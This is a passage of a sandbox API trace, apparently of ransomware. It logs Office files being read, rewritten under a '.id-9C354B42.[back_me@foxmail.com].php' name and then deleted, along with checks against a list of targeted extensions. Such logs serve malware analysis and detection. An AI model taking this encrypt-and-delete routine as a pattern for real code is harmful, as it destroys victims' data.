SetEndOfFile (hFile=0x1b4) returned 1 [0039.866] CloseHandle (hObject=0x1b4) returned 1 [0039.867] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.867] SetEndOfFile (hFile=0x1b0) returned 1 [0039.868] CloseHandle (hObject=0x1b0) returned 1 [0039.868] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0039.869] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\readme.htm")) returned 1 [0039.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0039.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0039.869] lstrlenW (lpString=".doc") returned 4 [0039.869] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1 [0039.869] lstrlenW (lpString=".docx") returned 5 [0039.869] lstrcmpiW (lpString1=".docx", lpString2="E.HTM") returned -1 [0039.869] lstrlenW (lpString=".pdf") returned 4 [0039.869] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0039.869] lstrlenW (lpString=".xls") returned 4 [0039.869] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0039.869] lstrlenW (lpString=".xlsx") returned 5 [0039.869] lstrcmpiW (lpString1=".xlsx", lpString2="E.HTM") returned -1 [0039.869] lstrlenW (lpString=".ppt") returned 4 [0039.869] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0039.869] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0039.869] lstrlenW (lpString=".zip") returned 4 [0039.869] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0039.869] lstrlenW (lpString=".rar") returned 4 [0039.869] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0039.869] lstrlenW (lpString=".bz2") returned 4 [0039.869] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0039.869] lstrlenW (lpString=".7z") returned 3 [0039.869] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0039.870] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0039.870] lstrlenW (lpString=".dbf") returned 4 [0039.870] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0039.870] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0039.870] lstrlenW (lpString=".1cd") returned 4 [0039.870] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0039.870] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0039.870] lstrlenW (lpString=".jpg") returned 4 [0039.870] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0039.870] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0039.870] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0039.870] lstrlenW (lpString=".doc") returned 4 [0039.870] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1 [0039.870] lstrlenW (lpString=".docx") returned 5 [0039.870] lstrcmpiW (lpString1=".docx", lpString2="E.HTM") returned -1 [0039.870] lstrlenW (lpString=".pdf") returned 4 [0039.870] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0039.870] lstrlenW (lpString=".xls") returned 4 [0039.870] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0039.870] lstrlenW (lpString=".xlsx") returned 5 [0039.870] lstrcmpiW (lpString1=".xlsx", lpString2="E.HTM") returned -1 [0039.870] lstrlenW (lpString=".ppt") returned 4 [0039.870] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0039.870] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0039.870] lstrlenW (lpString=".zip") returned 4 [0039.870] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0039.870] lstrlenW (lpString=".rar") returned 4 [0039.870] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0039.870] lstrlenW (lpString=".bz2") returned 4 [0039.870] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0039.870] lstrlenW (lpString=".7z") returned 3 [0039.870] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0039.870] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0039.870] lstrlenW (lpString=".dbf") returned 4 [0039.871] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0039.871] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0039.871] lstrlenW (lpString=".1cd") returned 4 [0039.871] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0039.871] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\README.HTM") returned 71 [0039.871] lstrlenW (lpString=".jpg") returned 4 [0039.871] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0039.871] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0039.871] lstrlenW (lpString="AccessMUI.XML") returned 13 [0039.871] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0039.872] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=1349) returned 1 [0039.872] CloseHandle (hObject=0x1b0) returned 1 [0039.872] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml")) returned 0x20 [0039.872] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0039.872] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0039.872] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.872] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0039.872] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0039.873] GetLastError () returned 0x0 [0039.873] ReadFile (in: hFile=0x1b0, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x545, lpOverlapped=0x0) returned 1 [0040.203] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x550, lpOverlapped=0x0) returned 1 [0040.204] ReadFile (in: hFile=0x1b0, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.204] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xee, lpOverlapped=0x0) returned 1 [0040.204] SetEndOfFile (hFile=0x1b4) returned 1 [0040.204] CloseHandle (hObject=0x1b4) returned 1 [0040.205] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.205] SetEndOfFile (hFile=0x1b0) returned 1 [0040.206] CloseHandle (hObject=0x1b0) returned 1 [0040.206] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0040.206] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml")) returned 1 [0040.281] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0040.281] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0040.281] lstrlenW (lpString=".doc") returned 4 [0040.281] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.282] lstrlenW (lpString=".docx") returned 5 [0040.282] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.282] lstrlenW (lpString=".pdf") returned 4 [0040.282] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.282] lstrlenW (lpString=".xls") returned 4 [0040.282] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.282] lstrlenW (lpString=".xlsx") returned 5 [0040.282] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.282] lstrlenW (lpString=".ppt") returned 4 [0040.282] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.282] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0040.282] lstrlenW (lpString=".zip") returned 4 [0040.282] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.282] lstrlenW (lpString=".rar") returned 4 [0040.282] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.282] lstrlenW (lpString=".bz2") returned 4 [0040.282] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.282] lstrlenW (lpString=".7z") returned 3 [0040.282] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.282] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0040.282] lstrlenW (lpString=".dbf") returned 4 [0040.282] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.282] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0040.282] lstrlenW (lpString=".1cd") returned 4 [0040.282] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.282] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0040.282] lstrlenW (lpString=".jpg") returned 4 [0040.282] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.282] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0040.282] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0040.282] lstrlenW (lpString=".doc") returned 4 [0040.282] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.282] lstrlenW (lpString=".docx") returned 5 [0040.283] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.283] lstrlenW (lpString=".pdf") returned 4 [0040.283] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.283] lstrlenW (lpString=".xls") returned 4 [0040.283] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.283] lstrlenW (lpString=".xlsx") returned 5 [0040.283] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.283] lstrlenW (lpString=".ppt") returned 4 [0040.283] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.283] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0040.283] lstrlenW (lpString=".zip") returned 4 [0040.283] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.283] lstrlenW (lpString=".rar") returned 4 [0040.283] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.283] lstrlenW (lpString=".bz2") returned 4 [0040.283] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.283] lstrlenW (lpString=".7z") returned 3 [0040.283] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.283] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0040.283] lstrlenW (lpString=".dbf") returned 4 [0040.283] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.283] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0040.283] lstrlenW (lpString=".1cd") returned 4 [0040.283] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.283] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 106 [0040.283] lstrlenW (lpString=".jpg") returned 4 [0040.283] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.283] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0040.283] lstrlenW (lpString="InfoPathMUI.XML") returned 15 [0040.284] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0040.284] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=1231) returned 1 [0040.284] CloseHandle (hObject=0x1bc) returned 1 [0040.284] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml")) returned 0x20 [0040.284] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0040.284] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0040.284] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.284] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.284] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0040.293] GetLastError () returned 0x0 [0040.293] ReadFile (in: hFile=0x1bc, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x4cf, lpOverlapped=0x0) returned 1 [0040.294] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x4d0, lpOverlapped=0x0) returned 1 [0040.295] ReadFile (in: hFile=0x1bc, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0040.295] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xf2, lpOverlapped=0x0) returned 1 [0040.295] SetEndOfFile (hFile=0x1b4) returned 1 [0040.295] CloseHandle (hObject=0x1b4) returned 1 [0040.296] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.296] SetEndOfFile (hFile=0x1bc) returned 1 [0040.297] CloseHandle (hObject=0x1bc) returned 1 [0040.297] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0040.297] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml")) returned 1 [0040.297] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0040.297] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0040.297] lstrlenW (lpString=".doc") returned 4 [0040.298] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.298] lstrlenW (lpString=".docx") returned 5 [0040.298] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.298] lstrlenW (lpString=".pdf") returned 4 [0040.298] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.298] lstrlenW (lpString=".xls") returned 4 [0040.298] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.298] lstrlenW (lpString=".xlsx") returned 5 [0040.298] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.298] lstrlenW (lpString=".ppt") returned 4 [0040.298] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.298] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0040.298] lstrlenW (lpString=".zip") returned 4 [0040.298] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.298] lstrlenW (lpString=".rar") returned 4 [0040.298] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.298] lstrlenW (lpString=".bz2") returned 4 [0040.298] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.298] lstrlenW (lpString=".7z") returned 3 [0040.298] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.298] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0040.298] lstrlenW (lpString=".dbf") returned 4 [0040.298] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.298] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0040.298] lstrlenW (lpString=".1cd") returned 4 [0040.298] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.298] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0040.298] lstrlenW (lpString=".jpg") returned 4 [0040.298] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.298] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0040.298] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0040.298] lstrlenW (lpString=".doc") returned 4 [0040.299] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.299] lstrlenW (lpString=".docx") returned 5 [0040.299] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.299] lstrlenW (lpString=".pdf") returned 4 [0040.299] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.299] lstrlenW (lpString=".xls") returned 4 [0040.299] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.299] lstrlenW (lpString=".xlsx") returned 5 [0040.299] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.299] lstrlenW (lpString=".ppt") returned 4 [0040.299] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.299] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0040.299] lstrlenW (lpString=".zip") returned 4 [0040.299] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.299] lstrlenW (lpString=".rar") returned 4 [0040.299] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.299] lstrlenW (lpString=".bz2") returned 4 [0040.299] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.299] lstrlenW (lpString=".7z") returned 3 [0040.299] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.299] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0040.299] lstrlenW (lpString=".dbf") returned 4 [0040.299] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.299] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0040.299] lstrlenW (lpString=".1cd") returned 4 [0040.299] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.299] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0040.299] lstrlenW (lpString=".jpg") returned 4 [0040.299] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.299] lstrcmpiW (lpString1=".XML", lpString2=".php") returned 1 [0040.300] lstrlenW (lpString="BRANDING.XML") returned 12 [0040.300] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0040.302] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=596341) returned 1 [0040.302] CloseHandle (hObject=0x1bc) returned 1 [0040.302] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml")) returned 0x20 [0040.302] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0040.302] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0040.302] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.302] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0040.302] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0040.303] GetLastError () returned 0x0 [0040.303] ReadFile (in: hFile=0x1bc, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: 